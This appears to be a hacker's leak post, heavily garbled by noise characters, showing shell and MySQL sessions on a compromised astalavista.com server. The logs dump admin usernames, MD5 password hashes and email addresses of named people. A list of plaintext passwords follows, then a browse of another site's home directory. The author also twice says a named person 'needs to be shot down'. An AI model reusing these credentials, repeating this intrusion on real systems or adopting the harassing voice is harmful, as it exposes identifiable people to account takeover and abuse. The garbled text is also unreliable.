2 N- ?. H) z5 I4 Z <link>http://www.astalavista.com/exploits</link>
) h1 ^) p; C2 s% f <description>All availably Exploits.</description>- c- ]) s( K! q9 z; Z
<language>en-us</language>
) u% G" P* P) V' x4 h <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>
$ ]2 ]; g! f ~/ N- ?8 U <docs>http://blogs.law.harvard.edu/tech/rss</docs>- \& h) A/ ?: G, |
<generator>Astalavista.com</generator>
& |- ~! k9 H9 U1 q# K- t" s3 L <webMaster>info@astalavista.com</webMaster>’ . $items . ‘
9 ?- J) J0 C; P2 S </channel>. O3 T0 h$ `! h% x. |
</rss>’;
4 P, K% {7 g% E. \: X* H( P
. ?9 U% I9 i7 A: ]8 z if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {- @, X, p/ v+ ^$ |
unlink (FULLPATH . ‘/feed/exploits.xml’);: F9 i- I) G! Q& j0 t2 I* m( U5 c+ b
}8 M. h& h# M/ O2 ]; J5 w( Z
% `; A& _# p d0 @ file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);4 r* W1 ^% W4 o0 o, G& f; |
[snip]
1 A7 J; b1 c4 @* X3 F( o: _
, r/ @( G1 {( H# Dsh-3.2$ cat exploits.sh3 t. M9 U' h0 f, K3 T
#!/bin/sh
& d/ q" Q. o0 T. a e: b
8 F3 }, p9 K2 ]) e0 b###########################################################0 g% U) U }# O$ T
# #
( i- `5 f7 ?$ w8 l C4 H# Title: milw0rm exploits adder #0 z' m+ J0 C0 Z j/ y+ z
# Description: Add all milw0rm exploits to the #
8 }4 S# e- A e0 U5 E. ] |# Astalavista.com database #2 _9 o* m9 V- h
# #
# Z8 M0 c% K4 P5 ]1 X# Company: Astalavista Group #
& x6 \) v8 M0 q4 A5 `# Author: Paulo M. Santos #
5 Y6 N# f" s( M# E-Mail: 链接标记paulo.santos@astalavista.ch ## l1 _" T* n) Y8 B
# #
( [# w4 t6 q8 M5 F9 D0 R9 C, f###########################################################
* f' X' G2 u6 O9 x- C2 y; O1 `+ {- f: b- G# N. R* n
# path
8 k8 S3 [7 |2 g/ k+ h! V& Jthis_path=/home/com/public_html/modifications/cronjobs! K6 G4 [! P7 D: {5 Q
. h+ |4 _" U m; z1 p# d3 z
# change directory9 t, E# e% w2 n
cd $this_path' N! X' C" c4 u$ U5 m5 k) X% L
cd tmp/
. Q& L. {; y9 x2 g, S# P1 D# X- J2 {( ~7 ], l" X
# delete files, Y8 ~6 |& O: g4 W0 i7 e; r3 w% U
rm -rf milw0rm.tar.* &
9 u% e+ B3 p% C8 W: u' Zrm -rf milw0rm/ &
* ?* X' L; n8 d! U9 k, j- A' T
7 B X( l1 r8 o; m8 U8 n+ G$ d# wget milw0rm paket
# g% `- N4 @; @- I& Bwget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]! ] d5 }' T U5 O
2 }& J& P* y# j4 B! w- o0 ^
# extract milw0rm paket
' t& y( @2 X+ ?% o6 @) x) Xtar -xvf milw0rm.tar.bz2
4 ]4 r! g1 I! }1 l9 Z8 t; p* \5 D' t3 J5 x
# change owner
2 O/ j* R+ \5 Achown -R com .' h: O$ V' p- v/ G- v6 n6 h. Z1 X
chgrp -R com .6 N* t9 p. G9 `8 ]8 w4 S
; X/ D* O' X& f( N/ X% e# execute php script
: L# X; A! u) v: q; ^/ _cd $this_path
. r2 Q9 L& D3 c1 N) ?php -q exploits.php
; r6 g: P" r9 W' Z- J4 A3 Q }0 s/ C4 a
# delete files. N @! H; h3 L- t. h1 e
rm -rf tmp/milw0rm.tar.*
2 K# l" w$ c1 C/ crm -rf tmp/milw0rm/
8 {/ w( R6 }: F% P9 @3 s5 L4 r, |: q9 l
sh-3.2$ echo “Paulo M. Santos needs to be shot down.”' C- F' f# U4 a9 f8 v+ E( K' E
Paulo M. Santos needs to be shot down.6 N% }! f+ W. x4 z# Y
& }4 S. j' _$ y0 D! @/ d
mysql -u contrexxuser2 -p
7 z& E7 R' B% _5 B vEnter password:
: ? B$ k$ W# I7 E, m ?0 XWelcome to the MySQL monitor. Commands end with ; or \g.$ l3 b4 Q2 n/ s. j$ C
Your MySQL connection id is 261694
; E9 u0 O5 ~! \$ Q& ?, s: [1 dServer version: 5.0.45-community-log MySQL Community Edition (GPL): Q1 C- q7 ]8 N7 u: X0 p
L8 M$ O7 n+ W2 G: q, e+ k, PType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.9 h4 q% Y% w9 J% w, I
/ l' N: X! U' Jmysql> show databases;
' N% J* h, ^' J. |: z' e+ b+——————–+ t) a/ c2 D4 R" U
| Database |+ m3 _/ i3 F3 y7 Q% h' F
+——————–+
- `2 @' j5 `% @. l| information_schema |
2 i8 b& j, d2 N s" x& Q+ r| com_contrexx2 |
# D7 I, m, t: T| com_contrexx2_live |
4 t& R8 n" W& a V; h) B" y| test |
! d3 ]- D9 [* ^6 n* n# C1 E8 d! j# o+——————–+
8 h/ c7 t/ m+ A$ H: p+ U. a4 rows in set (0.00 sec)
0 s+ U) j4 g& \& ^
. B1 q. C; P+ b8 o5 o- wmysql> use com_contrexx2_live
- ~6 E% J+ L* f3 UDatabase changed6 i( b6 ?7 P, ^) ]" [9 ]' t
mysql> show tables;
! C9 ~7 K: R& Q7 P9 C5 A$ N+————————————————–+8 D6 W5 t8 M) s M
| Tables_in_com_contrexx2_live |
A! o7 J8 c j5 W4 R% g' q+————————————————–+
- ~. @. f# ~ U$ \| cc_banner_counter |
3 Q/ ^) }9 H* [| cc_search_counter |
7 [* P( X9 z, I+ l| contrexx_access_group_dynamic_ids |3 m. a, ~6 K1 Z9 g. Q7 b; v& Q
| contrexx_access_group_static_ids |
( `( b3 L( i2 N- z- P. X t| contrexx_access_rel_user_group |4 Q& e( P l* J' P+ Y' X
| contrexx_access_settings |; g" O8 z& ~ `8 ], G! @
| contrexx_access_user_attribute |
* N+ x/ f k7 g6 U8 s6 e8 y( h, e! c| contrexx_access_user_attribute_name |# g$ [: x, `5 x. }7 w3 m( v& U
| contrexx_access_user_attribute_value |/ |9 F- c1 K/ J' n
| contrexx_access_user_core_attribute |
1 k& ?6 D; n3 c9 e1 U# c- I| contrexx_access_user_groups |$ y4 O5 I; i0 Y8 h! G3 y! @
| contrexx_access_user_mail |2 w" D: G2 {8 V" h% ^5 J* V2 I
| contrexx_access_user_profile |
) _# u1 F6 j1 ~. h. T1 ^| contrexx_access_user_title |
+ i; B* R' M# B- j$ {9 x* S5 }4 H* L| contrexx_access_user_validity |# B: r) W- a- k; `/ n" x
| contrexx_access_users |
M, C) `( @8 G' R| contrexx_backend_areas |
/ Q+ q6 {7 E9 s+ F/ n, i| contrexx_backups |+ I- J9 b- e0 p2 {* e: u: Q3 p
| contrexx_content |4 }8 b: T% w( a, `7 d
| contrexx_content_history |3 Y6 q. _9 H0 F
| contrexx_content_logfile |
# p {; R% k1 T| contrexx_content_navigation |, P0 @( k* }9 K& r9 Z& p+ M
| contrexx_content_navigation_history |
+ z Q0 R$ H7 k9 y1 O B' r| contrexx_ids |9 f- I3 N+ J9 v, K
| contrexx_languages |
/ r; Y* q- m3 P4 y3 C0 N| contrexx_lib_country |6 E% N1 y4 G' [ k
| contrexx_log |/ r0 S! K* F1 N l
| contrexx_module_alias_source |
/ }# [( N" Q: B c6 g| contrexx_module_alias_target |
6 ^& q( c% `8 [6 a| contrexx_module_block_blocks |
, E3 }. r$ y/ q0 F( L; k| contrexx_module_block_rel_lang |
3 t, G" h: m2 [7 K| contrexx_module_block_rel_pages |
, V" e. O6 H/ ~" || contrexx_module_block_settings |
. ^, W& a/ m) F( P| contrexx_module_blog_categories |. e/ d* P; x. l$ s
| contrexx_module_blog_comments |4 E: ~# J7 [" \9 x( R7 {/ _$ u
| contrexx_module_blog_message_to_category |
! f% {3 o2 P3 ~. Z2 I| contrexx_module_blog_messages |
. q' P6 b. @$ ?! P| contrexx_module_blog_messages_lang |4 j' n# P. L5 D- m: i( y0 `
| contrexx_module_blog_networks |7 p4 B+ M( c7 n/ H8 m$ n) k
| contrexx_module_blog_networks_lang |
1 g/ }0 J8 y5 Q5 L( F5 R1 f. ]| contrexx_module_blog_settings |5 d+ w* O1 N/ E; X
| contrexx_module_blog_votes |2 G' R5 f( f+ j# |/ M& O
| contrexx_module_calendar |( k% }( E9 a1 Z# g0 J9 N
| contrexx_module_calendar_access |" }4 J! ^2 Q% ^# d3 y
| contrexx_module_calendar_categories |
- z" h: {2 K; c| contrexx_module_calendar_form_data |4 P& E! k7 i6 v3 d' W. W% [
| contrexx_module_calendar_form_fields |$ m# x/ F! d1 R! }$ _: b: c
| contrexx_module_calendar_registrations |% P. n [5 ]; j9 g7 U) L
| contrexx_module_calendar_settings |; d+ ?8 V+ A8 d: E0 d
| contrexx_module_calendar_style |, Q' N5 Y c9 g
| contrexx_module_contact_form |9 v7 x9 ?0 Y/ G- i. x& ^! _& N: e
| contrexx_module_contact_form_data |8 {5 E' n8 u% U2 y/ w" J2 t7 }: K. [7 B
| contrexx_module_contact_form_field |
, U) G# S- ~/ {/ }2 t# C| contrexx_module_contact_settings |
! h$ `- F; { T1 I| contrexx_module_data_categories |
% J; @8 T2 [: F0 ?( O| contrexx_module_data_message_to_category |
( I" n6 u$ r" e+ `. Y| contrexx_module_data_messages |9 N2 R L5 h+ a* J2 C" f
| contrexx_module_data_messages_lang | F5 [0 U( Y/ `0 R1 j ?! Q
| contrexx_module_data_placeholders |" s! H6 ]' r" i7 C: p. P
| contrexx_module_data_settings |
, {& P& h: D) o7 e8 q8 v% W, p7 U| contrexx_module_directory_access |
* p7 l! F3 N' M! C4 H/ h: t% w, K6 I| contrexx_module_directory_categories |
- y( R( ]" k1 m1 r* H0 |- N- v# D| contrexx_module_directory_dir |
+ Y0 ^ j. Z% N; F: T) M( {& ?1 _| contrexx_module_directory_inputfields |1 k2 O- R& a0 v9 ]
| contrexx_module_directory_levels |
3 j& Z3 @/ Y3 x5 ~7 Q. {/ c| contrexx_module_directory_mail |
, v+ e# x- c! ?' @& n| contrexx_module_directory_rel_dir_cat |* O1 D6 F: N% S, n% i! [. E5 x# J" o
| contrexx_module_directory_rel_dir_level |0 ?. R8 l* G. J% S* H
| contrexx_module_directory_settings |
% s6 \/ p0 u& u; n| contrexx_module_directory_settings_google |" \7 X. { e7 ~; M
| contrexx_module_directory_vote |$ X( Q& |: ~( \: \5 l7 a0 `
| contrexx_module_docsys |
f9 @" o6 N% D4 }5 d0 V| contrexx_module_docsys_categories |
- M; i r% c% M# x1 p) e| contrexx_module_egov_configuration |
; H0 q3 n9 ^, @. }| contrexx_module_egov_orders |, B& J u+ \3 W9 S
| contrexx_module_egov_product_calendar |
) ]0 A& d8 V; ], Y. ^3 d3 @| contrexx_module_egov_product_fields |
( Z- H2 q9 T! J2 h| contrexx_module_egov_products |% X* J8 W( R4 ~6 ~& t$ r
| contrexx_module_egov_settings |( M! L3 c3 {5 S( U; r4 e! A1 i
| contrexx_module_exploits |
4 i/ J4 I4 U5 J- @8 f, f| contrexx_module_exploits_categories |
* z! @1 R- |0 s- V8 B: S5 G| contrexx_module_feed_category |
$ C# f/ h) n p+ O; s# r* W| contrexx_module_feed_news |
1 ], A: t2 O4 v/ s+ s| contrexx_module_feed_newsml_association |$ r" E( a+ v, q' R# A
| contrexx_module_feed_newsml_categories |
' h0 C2 \# ?( D; D$ P| contrexx_module_feed_newsml_documents |
; @8 d' M* ^" R" Y; K6 X# f| contrexx_module_feed_newsml_providers |! T$ S/ d$ k; i' C3 X
| contrexx_module_forum_access |
; Q h1 X% W; \$ g& A+ G- n, H. Z| contrexx_module_forum_categories |
6 a) F$ I, J$ l! G I2 h| contrexx_module_forum_categories_lang |
/ r% P5 k2 e1 a# ^- @& Z. U| contrexx_module_forum_notification |
2 C, S i2 i$ z5 G5 x4 @. H| contrexx_module_forum_postings |
4 E3 ~7 _' P6 H" g# H| contrexx_module_forum_rating |( _% ]3 n7 u( h% W& Y$ D0 B
| contrexx_module_forum_settings |7 e7 u* c3 Q5 {+ l* z
| contrexx_module_forum_statistics |3 E. f5 B9 g9 K
| contrexx_module_gallery_categories |
5 L+ L0 l2 }. r( o' n5 @| contrexx_module_gallery_comments |, R0 K3 R5 r1 H* N
| contrexx_module_gallery_language |
! [9 J/ n" Z) W5 R, [! a- G8 ?| contrexx_module_gallery_language_pics |$ z4 U9 s! X; _" u
| contrexx_module_gallery_pictures |
]( a/ _+ L8 e# J6 |* ]) a' @$ g" Q| contrexx_module_gallery_settings |
: Q7 a; O: [/ n( c4 w| contrexx_module_gallery_votes |. h" b( M* m7 _4 {1 L5 S
| contrexx_module_guestbook |" f0 H- R! C& e7 S
| contrexx_module_guestbook_settings |
8 K3 y5 K4 t/ P2 k| contrexx_module_livecam |
3 M& h; N4 `* b9 p" N& l| contrexx_module_livecam_settings |7 }" Z; c5 d7 j: E! l
| contrexx_module_market |! C$ _9 ~9 j* @& P/ j6 N. g
| contrexx_module_market_access |
0 R* Z' D4 H! K5 n| contrexx_module_market_categories |
' u- F) F+ _, F" ]7 }| contrexx_module_market_mail |6 k3 J) T) G2 k P9 _1 {
| contrexx_module_market_paypal |" Y2 Y) s: t2 ~
| contrexx_module_market_settings |( l, U" {3 j% H- ^7 B
| contrexx_module_market_spez_fields |% ]* ~9 h# X4 l( \" Q
| contrexx_module_mediadir_access | X8 t: I" h, f7 C* R# ]
| contrexx_module_mediadir_categories |
" m- i6 D" m, o4 Y7 n! W, N| contrexx_module_mediadir_comments |8 u( l- ^. x4 g0 I I
| contrexx_module_mediadir_dir |
, p/ W$ B; r7 k" g9 A4 P4 `& t| contrexx_module_mediadir_inputfields |+ L6 H3 G2 U$ T8 L* ]# z5 j
| contrexx_module_mediadir_levels |
5 e* n- {# V' a. M+ C |' K, `" r| contrexx_module_mediadir_mail |* ]/ R. G* L! \& Z1 V
| contrexx_module_mediadir_rel_dir_cat |: e2 O$ F# H; @. H; v0 E7 ^7 g
| contrexx_module_mediadir_rel_dir_level |
; ^( m- o7 N" C| contrexx_module_mediadir_reports |
* k n) I u/ w: I| contrexx_module_mediadir_settings |
7 S6 f' V" i2 C$ B; L2 E8 W X| contrexx_module_mediadir_settings_google |; h' c3 B- g3 G) g3 @# B1 K0 d
| contrexx_module_mediadir_vote |8 A: T' y- ~/ P8 a; Q0 I
| contrexx_module_memberdir_directories |
$ g1 D5 Z& u* a- V| contrexx_module_memberdir_name |
% S# Q, P* X0 e3 a6 T' `: g| contrexx_module_memberdir_settings |
7 l6 E3 a$ V* ]| contrexx_module_memberdir_values |4 g8 N+ @; o+ S0 X
| contrexx_module_nettools_allowed_groups |
( ^8 H, X+ E7 z- }| contrexx_module_nettools_settings |( J, t* [" g/ N; q& Q
| contrexx_module_news |( ?& h) S- t( W2 O0 B: G
| contrexx_module_news_access |
$ L5 @: I8 ]/ }5 }, p9 s| contrexx_module_news_categories |
' k$ r3 `8 [, b$ X6 o) s. d| contrexx_module_news_settings |
' |' Q& n" a6 n2 U/ r| contrexx_module_news_teaser_frame |
# T2 K" L2 c+ ]4 F/ O: R% t [| contrexx_module_news_teaser_frame_templates |, F9 @# g9 n/ O( [
| contrexx_module_news_ticker |7 S: W: p" q2 v* I" X: U3 B+ Y( e: Y
| contrexx_module_newsletter |* E8 ^9 a9 Y! j" C$ {& J: D/ h6 y, L
| contrexx_module_newsletter_attachment |
& l, h" }* W9 y0 F0 J4 D| contrexx_module_newsletter_category |, ]% [% m2 v" |" g; W5 [
| contrexx_module_newsletter_confirm_mail |$ `- M1 s. p! H( D, X( W4 }
| contrexx_module_newsletter_rel_cat_news |
' \0 z& U) p3 k4 U* v; `# L| contrexx_module_newsletter_rel_user_cat |. `4 R2 k5 p* v) o* Q
| contrexx_module_newsletter_settings |
& {% q& k) r& ^, o' m| contrexx_module_newsletter_template |
. J% C0 g) o% v4 w" ?1 C| contrexx_module_newsletter_tmp_sending |6 d& x& G7 j* N: o
| contrexx_module_newsletter_user |
% Q9 u! C1 `0 ~, [ `( J| contrexx_module_newsletter_user_title |2 `4 [2 O- i, ~# F7 X
| contrexx_module_onlinetools_defaultports |% {* t: B8 _6 D4 ]) R: i6 q5 M3 ]
| contrexx_module_onlinetools_defaultports_back |
: c! g# J2 y3 v' G| contrexx_module_onlinetools_geolitecity_blocks |9 x% v3 ?6 q4 f: N1 D( B
| contrexx_module_onlinetools_geolitecity_country |
% k& k& \2 q' z1 K3 S; Y% w# W| contrexx_module_onlinetools_geolitecity_location |! e1 k, a, \" r2 j. t9 u3 Q
| contrexx_module_podcast_category |# u# i6 M* L- r! ~
| contrexx_module_podcast_medium |
# [0 z+ Z2 f t9 }6 U6 T| contrexx_module_podcast_rel_category_lang |6 o" ?0 a% f$ k4 T2 S7 n" i
| contrexx_module_podcast_rel_medium_category |: [# _" ]+ U, i: G |
| contrexx_module_podcast_settings |9 {( Q3 M4 g# U0 F+ c' N7 Q$ z: z
| contrexx_module_podcast_template |2 O) B! ?! {" U* r
| contrexx_module_proxydb |, j+ R' D8 j+ {# i& D/ f
| contrexx_module_recommend |
$ c W5 L& R7 \. K- f$ X| contrexx_module_repository |$ _* `, d* \1 |0 A
| contrexx_module_securitynews_cats |. O7 c8 c; I) ]) Q- {/ a' ]5 ?
| contrexx_module_securitynews_feeds |
* `% W0 W7 }$ J* P0 d; c4 k| contrexx_module_securitynews_news |
! G$ e" o) s% p& Q' ?5 t| contrexx_module_shop_categories | Z2 b. n7 L6 u1 J! Q/ P5 M1 s
| contrexx_module_shop_config |
+ F5 W1 V1 X% z1 j6 G0 w- x| contrexx_module_shop_countries |2 O7 @% E# l/ S1 Z6 t
| contrexx_module_shop_currencies |
* v* _# `# W m K2 L( `| contrexx_module_shop_customers |
9 Q4 s2 y! c7 j| contrexx_module_shop_importimg |6 a8 F. z3 V+ n/ z3 n- C+ g
| contrexx_module_shop_lsv | Q$ ?9 o3 N& U- L/ Y1 L4 e
| contrexx_module_shop_mail |2 z, s1 ?* i0 T: \4 j3 {
| contrexx_module_shop_mail_content |3 W( S9 h, Z* w2 V1 h& Z/ Y
| contrexx_module_shop_manufacturer |% o: E# H( f8 j# Z: ^
| contrexx_module_shop_order_items |
+ _; h8 d% ~1 D* i$ I2 Q/ `- ], E| contrexx_module_shop_order_items_attributes |
( v4 ?. u6 c5 {8 d| contrexx_module_shop_orders |6 L* H7 P/ `9 o# J* {2 i/ M
| contrexx_module_shop_payment |9 ?& F+ d! {' T; P _. @% m
| contrexx_module_shop_payment_processors |: e# J" [+ }; l' R
| contrexx_module_shop_pricelists |' R. M9 A2 E8 [# R6 I$ O X9 k
| contrexx_module_shop_products |
/ e; H& o) r& ]* ~0 ]& Z% G| contrexx_module_shop_products_attributes |
' [4 A6 e, m* H' N) Y7 A' U4 E| contrexx_module_shop_products_attributes_name |
8 f: E/ u! c! F+ I| contrexx_module_shop_products_attributes_value |, l) u2 j, V( W, o/ e
| contrexx_module_shop_products_downloads |
% j, b2 J6 b- ]9 f& S% n, j0 T| contrexx_module_shop_rel_countries |/ E8 y2 @2 V, x" z
| contrexx_module_shop_rel_payment |
7 f l k) j8 `! o; x| contrexx_module_shop_rel_shipment |; N$ w* B( [9 T s9 P4 e: P% Q
| contrexx_module_shop_shipment_cost |( M& ~% N6 u0 `# H( C/ x4 J9 m2 ?
| contrexx_module_shop_shipper |
/ n7 U9 u; ^% ^ F" F z| contrexx_module_shop_vat |+ p5 U8 w" s3 f+ s* Q' |2 T4 o
| contrexx_module_shop_zones |4 d, w: j |: U# y
| contrexx_module_u2u_address_list |
/ N4 D" W$ B+ e, U| contrexx_module_u2u_message_log |
6 H' p W, |& X) y0 K3 X# A| contrexx_module_u2u_sent_messages |" o3 `, x* H, V5 n
| contrexx_module_u2u_settings |
" h' C- d2 q5 Y0 S& p+ O| contrexx_module_u2u_user_log |4 l. ?$ ~9 K( z$ L
| contrexx_modules |! @" h5 [6 D. l. ^
| contrexx_sessions |/ K+ L. o# F m4 V! c
| contrexx_settings |4 F. N9 v; i! L8 ]5 T
| contrexx_settings_smtp |* ~* ^+ I! L/ u/ j* I
| contrexx_skins |
0 |0 {2 C `$ N; W& s7 n| contrexx_stats_browser |
# B( O( h1 F. E1 c! k: M9 M {| contrexx_stats_colourdepth |3 S0 s. Y+ o6 s
| contrexx_stats_config |; Z; `, H; W6 J$ T
| contrexx_stats_country |! |- F; O8 S0 \8 g
| contrexx_stats_hostname |1 |: k* h' Q8 m; s! b, m& b: w
| contrexx_stats_javascript |. {) Y6 F/ R/ q, i6 ] [' \" J' Y3 d' W% _
| contrexx_stats_operatingsystem |0 ^. ?* O2 `. R3 x' M4 h; x8 \6 v
| contrexx_stats_referer |
3 q2 D: x" x, o& c. x| contrexx_stats_requests |
2 p$ L! e# l' A1 V1 O& d- y8 @| contrexx_stats_requests_summary |
U+ j% b$ `2 y/ E- |% m! A6 n| contrexx_stats_screenresolution |+ k& i& G) ] H
| contrexx_stats_search |( L: o- T* p$ v& ]7 q9 N: o6 o
| contrexx_stats_spiders |
~! J0 D) a+ o. O4 Z* {| contrexx_stats_spiders_summary |+ H! ^! S6 J3 J& V& j
| contrexx_stats_visitors |5 `4 |8 B0 q+ P/ q; f! F& ~, E
| contrexx_stats_visitors_summary |
* l8 g9 N9 Q2 l. D5 m: }* d" a| contrexx_voting_additionaldata |# F3 R T- _4 v
| contrexx_voting_email |$ L' g4 w1 d( r" Y
| contrexx_voting_rel_email_system |5 ]; j3 L$ Q5 E7 \, r( t
| contrexx_voting_results |- I& e6 m- @0 H6 V2 G
| contrexx_voting_system |- d0 Q% u8 ~+ O( W' C! z, }
| foo |
+ L- ~, ^$ v% m8 {2 Z5 e& n+————————————————–+
/ }# y* y- K& ~227 rows in set (0.01 sec)
; @; C; D1 w( @5 d
* C- h7 ^0 s+ S- m' Kmysql> select count(*) as skids from contrexx_access_users;0 r; i/ C; h) o% O9 v; G* D; }
+——-+9 }$ y. `7 T$ u6 n2 B
| skids |
0 l! X$ W; l+ [) _# |1 ~+——-+
9 W$ F$ ~# w& T# H# E S| 53699 |
5 T& d0 e) {! ?+——-+
2 q7 }" L N7 b+ x1 row in set (0.00 sec)0 J, p) T+ g4 q# U# g; M$ G! O
7 m% \4 }% |8 [* }% e; b* Mmysql> describe contrexx_access_users;
2 k3 b( S& Q4 n. T+——————+——————————————+——+—–+————–+—————-+
8 W9 L) {8 y/ {! n/ k| Field | Type | Null | Key | Default | Extra |7 E, M7 ^+ D5 m; R( {
+——————+——————————————+——+—–+————–+—————-+3 p" R- D! ?- {5 `& D8 {
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |& e6 v+ V. h/ |$ V j- {
| is_admin | tinyint(1) unsigned | NO | | 0 | |- s' T- Z3 Z5 n3 Z, n
| username | varchar(40) | YES | MUL | NULL | | m' y5 F- Y3 @/ v. M) \6 J
| password | varchar(32) | YES | | NULL | |$ S9 g$ h$ h8 y( G, u! o, O M) y
| regdate | int(14) unsigned | NO | | 0 | |# b0 [. v) k: t- I! v
| expiration | int(14) unsigned | NO | | 0 | |# o1 e1 D3 @ m, N; S1 }, l
| validity | int(10) unsigned | NO | | 0 | |1 r6 C' j% F9 u& G8 Q0 s* `
| last_auth | int(14) unsigned | NO | | 0 | |
0 _4 B+ e" L/ H5 s| last_activity | int(14) unsigned | NO | | 0 | |
: C! V1 Y/ q* q3 y4 l" [| email | varchar(255) | YES | | NULL | |
& @7 B& `) j2 l: _+ C# \# d| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |6 u( H) N/ _# C, Z+ O5 i+ B
| frontend_lang_id | int(2) unsigned | NO | | 0 | |8 x2 K9 B2 t2 Z, T/ e
| backend_lang_id | int(2) unsigned | NO | | 0 | |
' @1 V L; R+ s4 @$ K| active | tinyint(1) | NO | | 0 | |( R6 M0 V' }1 R6 A [+ G2 p1 _
| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |
9 V! Z& G$ d1 b9 W! k- n: U| restore_key | varchar(32) | NO | | | |* j; g; `$ E6 F( [" r; |
| restore_key_time | int(14) unsigned | NO | | 0 | |
) q/ c: W1 D6 r. a' f& k' T| u2u_active | enum(’0′,’1′) | NO | | 1 | |, Z- ~: l2 y' _6 _3 R. a: p
+——————+——————————————+——+—–+————–+—————-+
2 I# U+ E4 v* o* q2 Y18 rows in set (0.00 sec)7 t/ b# {6 W& s" l
+ Z; ?, U2 l6 ^+ ?: |2 q+ `
mysql> select username,password,email from contrexx_access_users where is_admin = 1;
/ J8 L( ], b$ W* w0 f+————+———————————-+—————————–+0 s) G& A, k4 D( `( F
| username | password | email |
/ a" ?" T2 q8 w8 g5 S. i+————+———————————-+—————————–+
: j, m4 F; ~, y& P4 l4 d1 x" ^| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |4 u; _' u% @& V2 H- i- |
| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |
; ]6 y6 [9 k. n" B; R& V1 \6 A| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |
/ U: v8 v# {8 S6 Q% W| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |, e a, D$ B U5 Z; k! h
+————+———————————-+—————————–+
; {* w3 A0 ?( |; ^+ i7 z4 rows in set (0.04 sec)
* H8 e. r$ z) H9 ?! c
& e8 J" \3 X+ c; \# h8 z; V( }mysql> exit;7 @, L6 D; z6 ~
Bye
/ _" A6 O5 O; x- C3 u( ]0 O4 z2 S7 g* S) ~5 x
[~] There you go, your “team of security and IT professionals” is a joke.
6 M; G/ ~" s' b( Z. l2 S3 I8 y" Q V- a, l! s' |. a3 i) k- A
+——————————+4 p3 [3 Q; E- ]" g
system:f82BN3+_*
C5 Y4 ~, {, _% cBe1er0ph0r:belerophor4astacom# V+ V" W% }3 e& Z
prozac:asta4cms!, W, s. i" W, A& P% M: q, Q8 E) u
commander:mpbdaagf6m
& U/ J& t& d2 V# psykadul:ak29eral4 J/ I F; k6 V" m
+——————————+
7 E6 s7 t& x$ h) V0 r) Z D4 Z9 K h( m4 V" d+ N) X
[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)7 U9 @: X( ?5 P( ^5 l
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.
9 z( K4 L z2 d7 U" k; u7 `9 t* W0 K* ?/ n+ s# ?
[~] Lets move to astalavista.net now,3 @9 J# Q9 `( R' T0 n
6 ^& x! a2 g) T" D# [9 J
From <链接标记[url]https://www.astalavista.net/[/url]>: [- g' B$ t, _
>> Everyone knows that the best defense is a good offense.. w9 A( m6 |3 @
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.
0 e; F; t* _7 @& q>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.; S0 ?% g: n* v/ W/ T' S
>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”* K' \& [$ V G; e& b& ?5 R
# G" i( o9 d( y
>> Go ahead, try and hack our server . in a completely legal way!& m' B7 Q6 ], Y _: [
>> Learn by doing: We offer our members tricky tasks and challenges on an
2 p. N! g3 |, U/ s- d>> ongoing basis so you can test your knowledge and abilities. You can also# k- F! Y% w' n8 f$ e1 O
>> demonstrate what you.ve mastered by taking part in regular hacker contests
& F {( j& {8 ?% s4 d' G# x>> and war games: Y' L% b, v( `0 b# W
) U3 o8 q) ]. a
[~] Lets take a look there, after all… they are hack-proof, aren’t they?!7 J1 t! W* @& n3 s4 y! }
; Y, W: [/ u, N# b6 x; K* A: R[-] Tricky task: Find home dir of astalavista.net% b2 d6 R) R/ ^ x
3 e/ P0 k" s1 ?/ u
sh-3.2$ ls -la ~astanet# `, |8 m: j" q9 H$ L6 ~% C( M
total 48
' C# q4 u. E$ Z, i odrwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .( O+ q$ v; f4 c3 m5 C" r" d
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
/ B& M D& X2 ]/ _0 ]4 wdrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth' D0 m" E* M$ U G" m( D
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history4 \$ K$ m9 \! D7 r+ S1 |
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout& P9 U3 G0 [* e9 F4 Y
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
1 v+ z2 J; _8 ~. L-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
0 a" [& N9 ^$ A" Udrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
! P. w0 e1 K! Z2 }7 T$ E2 Cdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap( ~1 }4 R+ F5 J: I
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
6 I: B9 s# b) a! V' |lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html( l( _* x3 ^1 ?) `. e
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
5 L2 V& z! P) x! _
% Q7 A( [: X# G) |sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
. Y7 \5 R/ }3 y2 m% `sh-3.2$ ls -la( c- ^( I* m1 l8 I+ W1 O; k+ O% E' i+ z
total 200( W' L: ]$ [* Q6 i' f, N8 ^
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .9 k& h% Y( g" c7 C
drwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..8 \4 v* ^! ]* j$ f9 I8 D, V
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007
